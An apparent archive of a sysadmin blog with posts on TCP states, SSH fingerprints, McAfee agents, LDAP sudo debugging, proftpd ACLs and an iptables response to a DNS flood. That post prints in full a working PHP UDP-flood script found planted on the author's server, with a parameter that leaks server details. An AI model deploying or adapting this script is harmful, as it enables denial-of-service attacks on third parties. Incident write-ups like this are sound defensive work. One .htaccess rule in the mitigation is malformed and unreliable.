You can read pdf document here http://www.nordu.net/development/2nd-cnnw/tcp-analysis-based-on-flags.pdf

H3C's implementations of sync flood solution http://www.h3c.com/portal/Products___Solutions/Technology/Security_and_VPN/Technology_White_Paper/200812/624110_57_0.htm

Using iptables to resolve sync flood issue http://pierre.linux.edu/2010/04/how-to-secure-your-webserver-against-syn-flooding-and-dos-attack/ and http://www.cyberciti.biz/tips/howto-limit-linux-syn-attacks.html

You may also consider using tcpkill to kill half-open sessions (use ss -s, netstat -s, or tcptrack to see a connection summary, and look for sockets in SYN_RECV).

Output from netstat -atun:

The reason for waiting is that packets may arrive out of order or be retransmitted after the connection has been closed. CLOSE_WAIT indicates that the other side of the connection has closed the connection. TIME_WAIT indicates that this side has closed the connection. The connection is being kept around so that any delayed packets can be matched to the connection and handled appropriately.

More on FIN_WAIT at http://kb.iu.edu/data/ajmi.html (note one error there: 2MSL, where MSL is the Maximum Segment Lifetime, is 120s, not 2ms)

All about tcp socket states: http://www.krenel.org/tcp-time_wait-and-ephemeral-ports-bad-friends/

And here's more about tcp connection(internet socket) states: https://en.wikipedia.org/wiki/Transmission_Control_Protocol#Protocol_operation

get linux server fingerprint through using ssh-keygen

July 31st, 2013 Comments off

Run ssh-keygen -lf /etc/ssh/ssh_host_rsa_key.pub on the server to get its fingerprint, which corresponds to the one shown in:

$ ssh <test-host>
The authenticity of host 'testhost[ip address]' can't be established.
RSA key fingerprint is <xx:xx:xx....>
Are you sure you want to continue connecting (yes/no)? yes
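To see where such a fingerprint comes from, you can generate a throwaway key and fingerprint it yourself (the -E option needs OpenSSH 6.8 or newer; older releases print the colon-separated MD5 form by default):

```shell
# create a disposable RSA key pair (no passphrase) and fingerprint it
rm -f /tmp/demo_key /tmp/demo_key.pub
ssh-keygen -t rsa -b 2048 -N '' -q -f /tmp/demo_key
ssh-keygen -lf /tmp/demo_key.pub          # SHA256:... form on modern OpenSSH
ssh-keygen -lf /tmp/demo_key.pub -E md5   # the xx:xx:... form shown in the prompt above
```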

403 CoachingSessionExceeded – McAfee the culprit

December 18th, 2012 Comments off

Today I tried to access a website on the company network that was very important to me, but the site loaded incompletely and so was not usable.

As always, the company network is somewhat restricted; for example, only outbound ports 80 and 443 are open. Like many companies, we use McAfee software to restrict employees' internet access, so I first suspected McAfee was the culprit.

Since I use the Chrome browser, I pressed F12 to open the developer tools. On the "Network" tab (you may need Ctrl+F5 to force-refresh the website), I found the following error status:

Then I opened that URL in a new tab, and the following page appeared:

So everything was sorted. I clicked the button "click here if you have read ....", went back to the site, refreshed, and everything was OK.

McAfee Solidcore agent and McAfee agent management

June 14th, 2012 Comments off

The File Integrity Monitoring (FIM) agent on Solaris and Red Hat servers is made up of two components: a Solidcore agent and a McAfee agent.

  • The Solidcore agent is the element that performs the file monitoring. It runs as a kernel module and needs a kernel restart (reboot) to disable it.
  • The McAfee agent is responsible for communication back to a central McAfee Enterprise Policy Orchestrator (ePO) server. It runs as a service (cma) that can be stopped with minimal impact to the running server. The software can also easily be removed or reinstalled without any impact.

With both the Solidcore and McAfee agents running, the centralised ePO controls the 'policy' of files to be monitored on the host. This can be overridden in the OS if need be, using the commands in the sections below.

Status check
To query the status of Solidcore on a server (as root), run:
# sadmin status

To query the policy a server is running with, the local config needs to be 'unlocked'. To do this, 'recover' the config, query the policy, then lock it down again:
# sadmin recover # password required, available from the ePO administrator
# sadmin mon list
# sadmin lockdown

Restart
The McAfee agent has an associated service 'cma' which can be stopped and restarted while the server is running.
- Stopping the service
service cma stop

- Starting the service
service cma start

The Solidcore agent has an associated service 'scsrvc'
- Stopping the service
service scsrvc stop

- Starting the service
service scsrvc start

Note:
The Solidcore agent runs as part of the UNIX kernel, so stopping the 'scsrvc' service doesn't fully disable the Solidcore software.
To do this:
- Open the local configuration for editing
sadmin recover # password needed from the ePO administrator

- Set the agent to be disabled at next reboot
sadmin disable

- Close the local configuration for edits
sadmin lockdown

- Reboot the server

When the server comes back, the agent will be disabled. This can be confirmed by running:
sadmin status

modify sudoers_debug in ldap.conf to debug sudo on linux and solaris

May 22nd, 2012 Comments off

If you run into problems with sudo against LDAP (sudoCommand matching), debug info printed to the console helps a lot. To show detailed debug info when running sudo, modify /etc/ldap.conf (for both Solaris LDAP and Linux LDAP):

# verbose sudoers matching from ldap
sudoers_debug 2

Setting sudoers_debug to 1 shows moderate debugging; setting it to 2 also shows the results of the matches themselves. For example, with sudoers_debug set to 2, executing a sudo command produces output like the following:

$ sudo -i
LDAP Config Summary
===================
uri ldaps://testLdapServer/
ldap_version 3
sudoers_base ou=SUDOers,dc=doxer,dc=org
binddn cn=proxyAgent,ou=profile,dc=doxer,dc=org
bindpw password
bind_timelimit 120000
timelimit 120
ssl on
tls_cacertdir /etc/openldap/cacerts
===================
sudo: ldap_initialize(ld, ldaps://testLdapServer/)
sudo: ldap_set_option: debug -> 0
sudo: ldap_set_option: ldap_version -> 3
sudo: ldap_set_option: tls_cacertdir -> /etc/openldap/cacerts
sudo: ldap_set_option: timelimit -> 120
sudo: ldap_set_option(LDAP_OPT_NETWORK_TIMEOUT, 120)
sudo: ldap_set_option(LDAP_OPT_X_TLS, LDAP_OPT_X_TLS_HARD)
sudo: ldap_simple_bind_s() ok
sudo: found:cn=defaults,ou=SUDOers,dc=doxer,dc=org
sudo: ldap sudoOption: 'ignore_local_sudoers'
sudo: ldap search '(|(sudoUser=liandy)(sudoUser=%linuxsupport)(sudoUser=%linux)(sudoUser=ALL))'
sudo: found:cn=LDAPpwchange,ou=sudoers,dc=doxer,dc=org
sudo: ldap sudoHost 'server01' ... not
sudo: ldap sudoHost 'server02' ... not
sudo: ldap search 'sudoUser=+*'
sudo: found:cn=test-su,ou=SUDOers,dc=doxer,dc=org
sudo: ldap sudoUser netgroup '+sysadmin-ng' ... not
sudo: found:cn=dba-su,ou=SUDOers,dc=doxer,dc=org
sudo: ldap sudoUser netgroup '+dba-ng' ... not
sudo: ldap sudoUser netgroup 'test01' ... not
sudo: ldap sudoUser netgroup 'test02' ... not
sudo: found:cn=Linux-Team-root,ou=SUDOers,dc=doxer,dc=org
sudo: ldap sudoUser netgroup '+linuxadmins' ... MATCH!
sudo: ldap sudoHost 'ALL' ... MATCH!
sudo: ldap sudoCommand 'ALL' ... MATCH!
sudo: Perfect Matched!
sudo: ldap sudoOption: '!authenticate'
sudo: user_matches=-1
sudo: host_matches=-1
sudo: sudo_ldap_check(0)=0x422

From the debugging output above, you can see that the account being authenticated belongs to the linuxadmins netgroup, and that netgroup is within the sudoUser scope of the Linux-Team-root sudoers role. As Linux-Team-root has sudoCommand "ALL" and sudoHost "ALL", and also the sudoOption "!authenticate", the user successfully gets root access with no password prompt.

Now let's go through a failed authentication to see the debugging information:

$ sudo hastatus -sum
LDAP Config Summary
===================
host testLdapServer
port 389
ldap_version 3
sudoers_base ou=SUDOers,dc=doxer,dc=org
binddn (anonymous)
bindpw (anonymous)
===================
ldap_init(testLdapServer,389)
ldap_set_option(LDAP_OPT_PROTOCOL_VERSION,0x03)
ldap_bind() ok
found:cn=defaults,ou=SUDOers,dc=doxer,dc=org
ldap sudoOption: 'ignore_local_sudoers'
ldap search '(|(sudoUser=liandy)(sudoUser=%normaluser)(sudoUser=%normaluser)(sudoUser=%patop)(sudoUser=ALL))'
ldap search 'sudoUser=+*'
found:cn=test-su,ou=SUDOers,dc=doxer,dc=org
ldap sudoUser netgroup '+sysadmin-ng' ... not
found:cn=tstwas-su,ou=SUDOers,dc=doxer,dc=org
ldap sudoUser netgroup '+linux-team-ng' ... not
found:cn=normal-su,ou=SUDOers,dc=doxer,dc=org
ldap sudoUser netgroup '+normaluser-ng' ... MATCH!
ldap sudoHost 'all' ... MATCH!
ldap sudoCommand '/opt/OV/bin/OpC/opcagt -start' ... not
ldap sudoCommand '/opt/OV/bin/OpC/opcagt -status' ... not
ldap sudoCommand '/opt/OV/bin/OpC/opcagt -stop' ... not
ldap sudoCommand '/opt/OV/bin/OpC/opcagt -kill' ... not
user_matches=-1
host_matches=-1
sudo_ldap_check(0)=0x04
Password:

From this we can see that although the user being authenticated is in the "normal-su" sudoers role and the host matches its sudoHost, there is no sudoCommand entry covering "hastatus -sum", so the authorization ultimately fails (user_matches=-1, host_matches=-1) and sudo prompts for a password.
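For reference, an LDAP sudoers role like the cn=Linux-Team-root entry that matched in the first trace would look roughly like the following LDIF. Attribute names come from sudo's standard LDAP schema; the dn, netgroup, and options are taken from the trace output above, while the objectClass lines are a sketch:

```ldif
dn: cn=Linux-Team-root,ou=SUDOers,dc=doxer,dc=org
objectClass: top
objectClass: sudoRole
cn: Linux-Team-root
sudoUser: +linuxadmins
sudoHost: ALL
sudoCommand: ALL
sudoOption: !authenticate
```

The "+" prefix on sudoUser is what makes sudo treat the value as a netgroup, which is why the trace searches for 'sudoUser=+*' separately.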

requiretty in sudoers file will break sudo for accounts without a tty

May 2nd, 2012 Comments off

Excerpted from /etc/sudoers:

Defaults requiretty

#
# Refuse to run if unable to disable echo on the tty. This setting should also be
# changed in order to be able to use sudo without a tty. See requiretty above.
#

This means that if you have created an account that runs without a tty, and you want that user to have privileges for some sudo commands, this setting (Defaults requiretty) will prevent the account from executing those sudo commands.

To fix this, you can do the following:

  1. Disable "Defaults requiretty" in the /etc/sudoers file
  2. Change nsswitch.conf to use "ldap files" rather than "files ldap"
  3. Better yet, don't enable local sudoers at all
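If disabling requiretty globally is too broad, sudo also supports per-user Defaults, so the tty requirement can stay on for everyone except the tty-less account. A sketch for /etc/sudoers (edit with visudo; the account name "deploy" here is a placeholder for your batch account):

```
Defaults            requiretty
Defaults:deploy     !requiretty
```

With this, only "deploy" can run sudo without a tty; all other users still get the protection of requiretty.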

resolved – port 53 dns flooding attack

April 13th, 2012 Comments off

I found this port 53 DNS flooding attack when the server became very unstable: the NIC was flapping and networking went down without the OS rebooting.

Using ntop as a detector, I found that DNS traffic was at a very high level (about 3Gb of traffic). So I decided to block DNS traffic and allow only the usual ports.

  • Disable autoboot of iptables, in case something goes wrong with the new rules

mv /etc/rc3.d/S08iptables /etc/rc3.d/s08iptables

  • Here are the rules

[root@doxer ~]# cat iptables-stop-flood.sh

#!/bin/bash
iptables -F

#Note that DROP is different than REJECT. REJECT will return error to client(telnet will return Connection refused from client), but DROP will just drop the packet(telnet will hang Trying and return Connection timed out).
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

#todo - allow no more than 5 new connections per second
#iptables -A INPUT -p tcp --syn -m limit --limit 5/s -i eth0 -j ACCEPT

# Allow traffic already established to continue
iptables -A INPUT -p all -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p all -m state --state INVALID -j DROP

#Allow ftp, http, mysql
#todo - if there's no -m multiport, then --dport or --sport must be a single port or a range
#todo - --ports source and destination ports are assumed to be the same
iptables -A INPUT -p tcp -m multiport --dport 20,21,80,3306 -j ACCEPT
iptables -A OUTPUT -p tcp -m multiport --sport 20,21,80,3000,3306 -j ACCEPT

#Allow outgoing httpd like telnet doxer 80
iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT

#Allow ntop
iptables -A INPUT -p udp -m multiport --dport 3000 -j ACCEPT
iptables -A INPUT -p tcp -m multiport --dport 3000 -j ACCEPT

#Allow sftp (Simple File Transfer Protocol on port 115, not SSH File Transfer Protocol, which uses the SSH port)
iptables -A INPUT -p tcp --dport 115 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 115 -j ACCEPT

#Allow ssh (both incoming and outgoing)
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --sport 22 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 22 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT

#allow rsync
iptables -A OUTPUT -p tcp --dport 873 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 873 -j ACCEPT
iptables -A INPUT -p tcp --sport 873 -j ACCEPT
iptables -A INPUT -p tcp --dport 873 -j ACCEPT

#allow ftp passive mode(you need set vsftpd first)
iptables -A INPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT
iptables -A INPUT -p tcp --sport 20 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 35000:37000 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 35000:37000 -j ACCEPT

#Allow ping. ICMP echo request is type 8, echo reply is type 0
#allow other hosts to ping
iptables -A INPUT -p icmp --icmp-type 8 -m limit --limit 1/s -j ACCEPT
#iptables -A INPUT -p icmp --icmp-type 8 -j ACCEPT
iptables -A OUTPUT -p icmp --icmp-type 0 -j ACCEPT
#allow this host ping others
iptables -A INPUT -p icmp --icmp-type 0 -j ACCEPT
iptables -A OUTPUT -p icmp --icmp-type 8 -j ACCEPT

#allow dns query
#iptables -A OUTPUT -p udp --dport 53 -j ACCEPT
#iptables -A INPUT -p udp --sport 53 -j ACCEPT
#iptables -A OUTPUT -p tcp --dport 53 -j ACCEPT
#iptables -A INPUT -p tcp --sport 53 -j ACCEPT

# Allow local loopback services
iptables -A INPUT -i lo -j ACCEPT

#save and restart iptables
/etc/init.d/iptables save
/etc/init.d/iptables restart

  • run the rules

chmod +x ./iptables-stop-flood.sh && ./iptables-stop-flood.sh

  • enable autoboot of iptables
If everything is ok, enable autoboot of iptables:
mv /etc/rc3.d/s08iptables /etc/rc3.d/S08iptables

After all these steps, DNS traffic dropped back to normal.
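If blocking port 53 outright is too aggressive (for instance, the host itself still needs name resolution), the commented-out DNS rules above could instead be rate-limited with the limit match. This is only a sketch with arbitrary numbers, and it needs root to apply:

```
#allow dns queries out, but throttle them to dampen a flood
iptables -A OUTPUT -p udp --dport 53 -m limit --limit 20/s --limit-burst 50 -j ACCEPT
#allow the matching replies back in
iptables -A INPUT -p udp --sport 53 -m state --state ESTABLISHED -j ACCEPT
```

Legitimate resolver traffic stays well under such a limit, while a flood like the one described here would be dropped once the burst is exhausted.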

NB:

After several days' investigation, I finally found out that this attack originated from some worms (PHP worms?) embedded in the dedecms directory. Here's one file, called synddos.php:

<?php
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_REQUEST['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
echo "Warning to: opening";
exit;
}

for($i=0;$i<$Sendlen;$i++){
$out .= "A";
}

$max_time = time()+$exec_time;

while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}

echo "Send Host:$host:$port<br><br>";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?>

This is crazy! That explains why there was so much outbound DNS traffic!

To cure this weakness:

1. Disable the fsockopen function in php.ini:

disable_functions = fsockopen

2. In the .htaccess file, prevent PHP scripts from running in writable directories:

RewriteEngine on
RewriteCond % !^$
RewriteRule uploads/(.*).(php)$ - [F]
RewriteRule data/(.*).(php)$ - [F]
RewriteRule templets/(.*).(php)$ - [F]

Add user account in proftpd server (privileges through setfacl & getfacl)

August 27th, 2010 Comments off

After you've installed proftpd on CentOS or Debian, adding a user account is the next step. Use the groupadd and useradd commands, and passwd to set a password; the new user is then ready to log in to the home directory via ftp (set the home directory with 'useradd -d').
But sometimes things are not that simple. Suppose you want the ftp user to have specific privileges on some directories, and you are not allowed to change the existing mode (for example, directories under /var/www/htdocs). In that case, it's time to use the ACL (Access Control List) feature of Linux.
Here are the detailed steps:
groupadd test
useradd -g test -d /var/www/virtual -s /sbin/nologin test # -s /sbin/nologin disallows shell login for the user
passwd test
setfacl -m u:test:rwx /var/www/virtual # user test now has rwx on the directory
getfacl /var/www/virtual

# In /etc/rc.local, add "setfacl -m u:test:rwx /var/www/virtual" to reapply the ACL at boot time

# If setfacl/getfacl are not on your system, install them first with yum install acl (CentOS) or apt-get install acl (Debian/Ubuntu)
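For reference, after the setfacl above, getfacl /var/www/virtual should print something along these lines (the owner and group shown here are assumptions; yours will differ):

```
# file: var/www/virtual
# owner: root
# group: root
user::rwx
user:test:rwx
group::r-x
mask::rwx
other::r-x
```

The user:test:rwx line is the ACL entry we added; the mask line caps the effective permissions of all named users and groups, so check it if the ACL doesn't seem to take effect.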

PS:

You can read more about ACLs in Linux here: https://wiki.archlinux.org/index.php/Access_Control_Lists